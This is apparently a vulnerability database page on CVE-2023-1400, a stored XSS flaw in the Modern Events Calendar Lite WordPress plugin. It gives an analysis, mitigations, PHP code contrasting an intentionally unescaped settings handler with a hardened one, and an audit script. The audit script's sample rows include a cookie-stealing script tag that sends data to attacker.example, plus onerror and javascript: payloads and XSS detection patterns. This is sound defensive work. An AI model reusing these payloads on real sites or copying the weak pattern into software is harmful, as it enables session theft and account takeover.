CVE-2023-1400: CWE-79 Cross-Site Scripting (XSS) in Modern Events Calendar Lite

Medium
Published: Mon Mar 27 2023 (03/27/2023, 15:37:25 UTC)
Source: CVE
Vendor/Project: Unknown
Product: Modern Events Calendar Lite

Description

The Modern Events Calendar Lite WordPress plugin before 6.5.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).

AI-Powered Analysis

Last updated: 06/22/2025, 11:06:51 UTC

Technical Analysis

CVE-2023-1400 is a stored cross-site scripting (XSS) vulnerability in the Modern Events Calendar Lite WordPress plugin in versions before 6.5.2. The plugin stores some of its settings without sanitising them and prints them back without escaping, so a user who can edit those settings can store a script payload that executes in the browser of anyone who later views the affected page. The notable point is that this works even when the unfiltered_html capability is withheld: on a multisite network WordPress removes that capability from per-site administrators and reserves it for super admins, and a single site can withhold it from everyone with the DISALLOW_UNFILTERED_HTML constant. The plugin therefore defeats a restriction the platform deliberately imposes on those accounts. In a multisite network a site administrator can target super admins or administrators of other sites, which is where the escalation potential lies; on a single site whose administrator already holds unfiltered_html, the finding is a coding defect rather than a new capability. The CVSS v3.1 base score is 4.8 (medium): network attack vector, low attack complexity, high privileges required, user interaction required (the victim must load the page carrying the payload), changed scope (the payload runs in the victim's browser, outside the vulnerable plugin), low confidentiality and integrity impact, and no availability impact. No exploitation in the wild is reported. Script execution in a privileged user's session typically allows theft of session cookies and nonces, actions performed with the victim's privileges (for example creating users or installing plugins), and defacement. The plugin is widely installed for event management on WordPress sites, so a compromised or malicious administrator account on such a site is a realistic precondition for attackers aiming to widen their foothold.
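To make the defect concrete, the following PHP illustration is added for this page; it is not code from Modern Events Calendar Lite, whose affected settings and function names are not on record here. It shows a settings round-trip with the weak behaviour the advisory describes beside the form WordPress developers expect (sanitise on save through register_setting(), escape on output). The option names demo_cal_title and demo_cal_notice, the option group and all function names are hypothetical, and the snippet assumes it is loaded as a WordPress plugin.

```php
<?php
/**
 * Added illustration for CVE-2023-1400 (not Modern Events Calendar Lite's code).
 * Assumes it is loaded as a WordPress plugin; the option names demo_cal_title /
 * demo_cal_notice, the option group and all function names are hypothetical.
 */

/* ---- Weak pattern: the behaviour the advisory describes ------------------ */

// Saves whatever an administrator posted, with a nonce check but no sanitize
// step and no regard for unfiltered_html. A multisite site admin (who lacks
// that capability) can store "<script>...</script>" just like a super admin.
// Defined for contrast only; it is deliberately not hooked anywhere.
function demo_cal_save_weak() {
    if (isset($_POST['demo_cal_title']) && check_admin_referer('demo_cal_save')) {
        update_option('demo_cal_title', wp_unslash($_POST['demo_cal_title']));
    }
}

// Echoes the stored value raw into the page: the stored payload runs in the
// browser of every user who opens this screen.
function demo_cal_render_weak() {
    $title = get_option('demo_cal_title', '');
    echo '<h2>' . $title . '</h2>';
    echo '<input type="text" name="demo_cal_title" value="' . $title . '">';
}

/* ---- Hardened pattern: sanitise on write, escape on read ----------------- */

// register_setting() attaches sanitize callbacks that WordPress runs on every
// update_option() for these options, whichever code path writes them. The
// settings form posts to options.php, which performs the nonce and
// manage_options checks before the callbacks run.
function demo_cal_register_settings() {
    register_setting('demo_cal_group', 'demo_cal_title', array(
        'type'              => 'string',
        'sanitize_callback' => 'sanitize_text_field', // plain text: strips all tags
        'default'           => '',
    ));
    register_setting('demo_cal_group', 'demo_cal_notice', array(
        'type'              => 'string',
        'sanitize_callback' => 'demo_cal_sanitize_notice',
        'default'           => '',
    ));
}
add_action('admin_init', 'demo_cal_register_settings');

// Limited HTML is allowed in the notice. wp_kses_post() keeps ordinary post
// markup and drops <script>, on* event handlers and javascript: URLs.
// Settings never legitimately need script, so everyone is filtered here,
// including unfiltered_html holders. The weakest rule that would still have
// honoured the platform's restriction is:
//     return current_user_can('unfiltered_html') ? $value : wp_kses_post($value);
function demo_cal_sanitize_notice($value) {
    return wp_kses_post((string) $value);
}

// Escape for the context the value lands in even though it was sanitised on
// the way in: values also reach the database through imports, WP-CLI or an
// older plugin version, so output escaping is the last line of defence.
function demo_cal_render_hardened() {
    $title  = get_option('demo_cal_title', '');
    $notice = get_option('demo_cal_notice', '');
    echo '<h2>' . esc_html($title) . '</h2>';
    echo '<input type="text" name="demo_cal_title" value="' . esc_attr($title) . '">';
    echo '<div class="notice-body">' . wp_kses_post($notice) . '</div>';
    echo '<textarea name="demo_cal_notice">' . esc_textarea($notice) . '</textarea>';
}
```

The two halves differ only in where the value is filtered: the weak version trusts the administrator's browser on the way in and the database on the way out, so a payload that gets past neither point runs for every viewer; the hardened version does not trust either.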

Potential Impact

For European organizations, especially those relying on WordPress for event management and using the Modern Events Calendar Lite plugin, this vulnerability can lead to unauthorized disclosure of sensitive information (confidentiality impact) and unauthorized modification of data or site content (integrity impact). Attackers exploiting this flaw could execute malicious JavaScript in the context of other users, potentially stealing session cookies or performing actions on behalf of legitimate users. This is particularly concerning for organizations with multisite WordPress deployments, common in educational institutions, media companies, and government agencies across Europe, where the assumption of restricted HTML input is bypassed. While availability is not directly impacted, the reputational damage and potential compliance issues (e.g., GDPR violations due to data leakage) could be significant. The medium severity score suggests a moderate risk, but the requirement for high privileges limits exploitation to compromised or malicious insiders or attackers who have already gained admin access. Nonetheless, the vulnerability could be leveraged as part of a multi-stage attack chain, increasing its overall threat to European organizations.

Mitigation Recommendations

1. Update the Modern Events Calendar Lite plugin to version 6.5.2 or later; this is the only actual fix. After updating, review the plugin's stored settings for payloads saved before the update, since the update changes how values are handled but does not clean what is already in the database.
2. Protect administrator accounts with multi-factor authentication and, where practical, IP restrictions on /wp-admin and /wp-login.php: the precondition for this vulnerability is an administrator session, so account compromise is the most likely path to exploitation.
3. Deploy a Content Security Policy to limit the impact of injected script. Note that the WordPress admin area depends heavily on inline scripts, so a policy strict enough to stop inline payloads needs nonces or hashes and careful testing before it is enforced; start in report-only mode.
4. Regularly audit user roles, and in multisite networks the list of super admins, so that only trusted accounts hold the privileges needed to edit plugin settings or to view them.
5. A Web Application Firewall with XSS signatures for request bodies can catch common payloads posted to the settings form, but the request comes from an authenticated administrator and signature-based rules are routinely bypassed, so treat this as a secondary control.
6. In multisite deployments, confirm that unfiltered_html is not granted to site administrators (it is withheld by default) and consider setting DISALLOW_UNFILTERED_HTML; be aware that the platform restriction only holds where plugins honour it, which is exactly what this vulnerability shows.
7. Run periodic vulnerability scans and penetration tests that cover installed plugins and stored XSS vectors, and monitor plugin advisories so that similar defects are patched promptly.
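Recommendation 1 leaves one practical step open: payloads saved before the update remain in the database until someone finds them. The following PHP audit helper is added here (it is not from the plugin or the original page) and flags options whose values contain script-capable markup. It assumes WP-CLI (wp eval-file) when run inside WordPress, where it reads $wpdb->options, and otherwise runs against constructed sample rows embedded in the file. The option names in the sample are hypothetical; the plugin's real option names are not on record here, so the prefix filter is left for the operator to fill in.

```php
<?php
/**
 * Added audit helper (not part of Modern Events Calendar Lite or the advisory).
 * Finds options whose stored value carries markup that executes script when
 * echoed unescaped into HTML, so payloads stored before the 6.5.2 update can
 * be located and cleaned.
 *
 * Inside WordPress:  wp eval-file audit.php
 * Multisite:         wp site list --field=url | xargs -I{} wp --url={} eval-file audit.php
 * Stand-alone:       php audit.php   (runs against the constructed sample rows)
 */

/** Triage patterns; a hit is a reason to look, not proof of exploitation. */
const DEMO_XSS_PATTERNS = array(
    'script tag'      => '/<\s*script\b/i',
    'event handler'   => '/\bon[a-z]+\s*=/i',
    'javascript: URL' => '/javascript\s*:/i',
    'data:text/html'  => '/data\s*:\s*text\/html/i',
    'iframe/object'   => '/<\s*(iframe|object|embed)\b/i',
    'svg'             => '/<\s*svg\b/i',
);

/**
 * @param array       $rows        list of ['option_name' => string, 'option_value' => string]
 * @param string|null $name_prefix restrict to options whose name starts with this
 * @return array list of ['option_name' => string, 'hits' => string[]]
 */
function demo_find_script_payloads(array $rows, ?string $name_prefix = null): array {
    $findings = array();
    foreach ($rows as $row) {
        if ($name_prefix !== null && strpos($row['option_name'], $name_prefix) !== 0) {
            continue;
        }
        $hits = array();
        foreach (DEMO_XSS_PATTERNS as $label => $re) {
            // Serialized option arrays are scanned as raw text, which is enough
            // for triage: the payload string is still present verbatim.
            if (preg_match($re, (string) $row['option_value'])) {
                $hits[] = $label;
            }
        }
        if ($hits) {
            $findings[] = array('option_name' => $row['option_name'], 'hits' => $hits);
        }
    }
    return $findings;
}

if (defined('ABSPATH')) {
    global $wpdb;
    // No user input reaches this query, so no prepare() is needed. Replace
    // null with the plugin's option prefix once you have identified it.
    $rows = $wpdb->get_results(
        "SELECT option_name, option_value FROM {$wpdb->options}",
        ARRAY_A
    );
    $findings = demo_find_script_payloads($rows, null);
} else {
    // Constructed sample rows (hypothetical option names and payloads).
    $rows = array(
        array('option_name' => 'blogname',
              'option_value' => 'Events & Co'),
        array('option_name' => 'demo_cal_title',
              'option_value' => 'Agenda <script>fetch("https://attacker.example/?c=" + document.cookie)</script>'),
        array('option_name' => 'demo_cal_notice',
              'option_value' => '<a href="javascript:alert(1)">More</a>'),
        array('option_name' => 'demo_cal_footer',
              'option_value' => '<img src=x onerror=alert(document.domain)>'),
    );
    $findings = demo_find_script_payloads($rows);
}

foreach ($findings as $f) {
    printf("%s: %s\n", $f['option_name'], implode(', ', $f['hits']));
}
```

On the sample rows the three demo_cal_* entries are reported and blogname is not. Findings should be cleaned through the plugin's own settings screen on the patched version rather than edited in the database by hand, and each hit is worth correlating with the audit log or the modifying user, since a payload in a setting implies an administrator account that saved it.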

Technical Details

Data Version
5.1
Assigner Short Name
WPScan
Date Reserved
2023-03-14T15:23:25.682Z
Cisa Enriched
true

Threat ID: 682d9846c4522896dcbf4f61

Added to database: 5/21/2025, 9:09:26 AM

Last enriched: 6/22/2025, 11:06:51 AM

Last updated: 8/14/2025, 11:06:13 PM
